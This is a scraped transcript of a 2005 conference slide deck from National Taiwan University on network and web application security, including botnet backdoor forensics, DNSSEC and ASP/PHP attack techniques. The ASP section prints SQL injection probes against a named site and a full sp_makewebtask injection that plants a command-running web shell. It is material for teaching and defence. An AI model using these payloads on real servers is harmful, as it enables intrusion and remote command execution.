Accountability and NC WISE Phyllis Price, Lori Ivey NCDPI 2010 Accountability Conference.
WISE 2005 Conference
50
WISE 2005 Conference Presented by Erion Lin, Department of Information Management, National Taiwan University
description
WISE 2005 Conference. Presented by Erion Lin, Department of Information Management, National Taiwan University. Outline. Introduction Network Security Botnet Forensic Analysis of Reverse Backdoor DNSSEC Net Gap Program Security SQL Injection Security Problems of ASP - PowerPoint PPT Presentation
Transcript of WISE 2005 Conference
WISE 2005 Conference
Presented by Erion Lin,
Department of Information Management,
National Taiwan University
Outline
Introduction Network Security
Botnet Forensic Analysis of Reverse Backdoor DNSSEC Net Gap
Program Security SQL Injection Security Problems of ASP Security Problems of PHP Some Hack Skills
Conclusion
Introduction
Introduction
2004 年爆發多起資訊安全事件 中國大陸駭客入侵總統府網站 大陸網軍對我數位社會的威脅 健保、車籍資料外洩數百萬筆 網路犯罪案件數的大幅度成長
網路犯罪案件數的大幅度成長
1446
35533081
5208
0
1000
2000
3000
4000
5000
6000
90 91 92 93
Introduction (Cont’d)
2004 年 10 月 21 日,行政院頒布「各政府機關( 構 ) 落實資安事件危機處理具體執行方案,要求「各政府機關 ( 構 ) 對極重要、重要之敏感文件、資料、檔案等之處理,應採取檔案加密方式儲存,並除非常必要之連網外,均兼採實體隔離等防護措施,以防止被侵入破壞、竄改、刪除或未經授權之存取動作」。
Network Security
Botnet
Internet
Zombie2
Zombie1
Zombie3
Hacker
Zombie4
Zombie5
HornAttack
Victim
DMZ
InternetIntranet
Router
Firewall
Bi-apple Backdoor─Initial State
Target ServerZombie2
Hacker
Zombie1
Zombie3
Bi-apple DNS Server
DNS Server
rabbi.bi-apple.net
127.0.0.1
rabbi.bi-apple.net
Intranet
Victim
DMZ
Internet
Router
Firewall
Backdoor Active State
Target ServerZombie2
Hacker
Zombie1
Zombie3
Bi-apple DNS Server
DNS Server
rabbi.bi-apple.net
61.221.104.181
rabbi.bi-apple.net
rabbi.bi-apple.net
61.221.104.181
61.221.104.181
Intranet
Victim
DMZ
Internet
Router
Firewall
Backdoor Active State(Cont’d)
Target ServerZombie2
Hacker
Zombie1
Zombie3
Bi-apple DNS Server
DNS Server
rabbi.bi-apple.net
61.221.104.18161.221.104.181
Syn from Victim 61.221.104.181:80
Remote Control
Attack
Remote Control
Feature of Bi-Apple Backdoor
Hard to Detect Reverse Backdoor Easy to Change the Zombie
Digital Forensic Environment
Digital Forensic Analysis
On-Line Analysis Off-Line Analysis
On-Line Analysis
Emergency Recovery Find Out the Reason
On-Line Analysis Steps
Remove Process Remove File and Registry Reboot
Step1 : Check Process Explorer
Step2 : Check Autoruns
Step2 : Check Autoruns
Step3 : Check TCPView
Step4: Check File
Step4: Check File
Step5: Check DLL
Step6: Reboot
Step7 : Check Process Explorer
Step8 : Check Sniffer
Step9: Stop Running Process
explorer.exe IEXPLORE.exe
Step10: Delete Malicious Registry
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B49DA3DF-E569-423d-BDEA-8F89128E8107}
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2E8A6CF6-3500-4A7D-9F54-69CD76D367D2}
Step11: Reboot
Check System Activities Again Check Network Activities Again
Internet
Normal DNS
Hacker
DNS Administrator DNS Server
DNS Message
Accepted
Fake DNS Message
Accepted
Internet
DNSSEC
Hacker
DNS Administrator DNS Server with DNSSEC
DNS Message
Accepted
Fake DNS Message
Rejected
DNSSEC
TSIG Secret Key One-Way Hash Function
SIG0 Public Key
Net Gap
Intranet
Internet
Router
Firewall
Malicious TCP/TP Packet Net Gap1
Net Gap2
Processing Packet
Normal TCP/IP Packet
Net Gap(Cont’d)
Net Gap1: Deconstruct Packets Net Gap2: Reconstruct Packets
Program Security
SQL Injection
The attacker can execute arbitrary SQL queries AND/OR commands on the backend database server through the Web application.
May Occur SQL Injection
SQL Injection Detective Skill
Before http://www.ox.com.tw/script.asp?id=2’
IE returns ODBC error record.
New Generation http://www.ox.com.tw/script.asp?id=2 and 1=1
IE returns normal record. http://www.ox.com.tw/script.asp?id=2 and 1=2
IE returns no record.
Security Problems of ASP
SQL Injection
InstallWeb Shell
Others(mdb)(db2)
(Informix)
Install Backdoor
Oracle
Recoveryxp_cmdshell
MS SQL
MySQL
Directory traversalFile Information Leak
Upload Area
Configure FileDefault configure
DBDetecting
XP_CMDSHELL
Add New Account
FirewallOutbound
testing
TFTP 網芳FTP
Echo script
Echo exe file
Failure Success
Hack Skills of ASP
ASP SQL Injection MSSQL DB Detection Skill MSSQL Store Procedure Skill ASP WebShell Skill Firewall Outbound Shell One Way Hacking Backdoor Skill
SQL Injection
Others(mdb)(db2)
(Informix)
Oracle
MS SQL
MySQLDirectory traversalFile Information Leak
Upload Area
Configure FileDefault configure
DBDetection
Failure Success
Load FileTesting
Save FileTesting
Password File
System Configuration File
HomepageSource Code
PasswordBreakingProgram
Account andPassword
ProgramDefection
Create Temp DB
Save Backdoor into DBSystem Section
WritableWeb Section
WritableOverrideMySQL
Install Backdoor
Install Web Shell
Security Problems of PHP
Hack Skills of PHP
Writable Directory Testing Skill File Uploading DB Skill Temp Table Design Dkill PHP WebShell Skill Password Breaking Skill Unix Backdoor Skill
MSSQL DB Detection Skill
And 1=(Select @@version)
MSSQL 版本資訊
MSSQL Store Procedure Skill
http://www.ox.com.tw/asp/test.asp?id=294 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X‘ AND name= 'xp_cmdshell')
存在 xp_cmdshell 的話 會顯示原有新聞資料
不存在 xp_cmdshell 的話 會出現錯誤訊息或跳回首頁
ASP WebShell Skill
exec sp_makewebtask @outputfile%3d‘c:\inetpub\wwwroot/a.asp',@charset%3dbig5,@query%3d'select ''<%25On Error Resume Next : Set oscript %3d Server.CreateObject("wscript.SHELL") : Set oscriptNet %3d Server.CreateObject("wscript.NETWORK") : Set oFileSys %3d Server.CreateObject("scripting.FileSystemObject") : szCMD %3d Request.Form(".CMD") : If (szCMD <>"")Then : szTempFile %3d "C:\" %26 oFileSys.GetTempName() : Call oscript.Run ("cmd.exe /c " %26 szCMD %26 " > " %26 szTempFile, 0, True) : Set oFile %3d oFilesys.OpenTextFile (szTempFile, 1, False, 0) End If %25> <HTML><BODY><FORM action%3d"<%25%3d Request.ServerVariables("URL")%25>" method%3d"POST"> <input type%3dtext name%3d".CMD" size%3d45 value%3d"<%25%3d szCMD %25>"><input type%3dsubmit value%3d"Run"> </FORM><PRE> <%25 If (IsObject(oFile))Then : On Error Resume Next : Response.Write Server.HTMLEncode(oFile.ReadAll) : oFile.Close : Call oFileSys.DeleteFile(szTempFile, True) : End If%25> </BODY></HTML> '‘ '
Backdoor Skills
重用連接埠技術 典型代表後門 : 駭客之門 它只有一個 dll 檔案,通過感染系統檔案啟動自身,被感染的系統檔案大小和日期都不會改變; . 同時採用線程插入技術,本身沒有進程;它本身不開連接埠,而是重用系統進程開的任意一個連接埠,如 80 , 135 , 139 , 445 等
Web
FTP
Firewall( 外對內開 21,80, 內對外全設限 )
IE
ftp
Reuse Port Skill
1
BD
3
2
Conclusion
Conclusion
Software Security Quality Identify all data of user input. Handle meta-character carefully. Don’t give too much error message to user. Try to understand the characteristic of programming language. Avoid using APIs that will call shell directly. Check all application’s default setting
New Version of BS7799 Different vendors.
Information Security Education Management, Information and System
Thanks for Your Listening
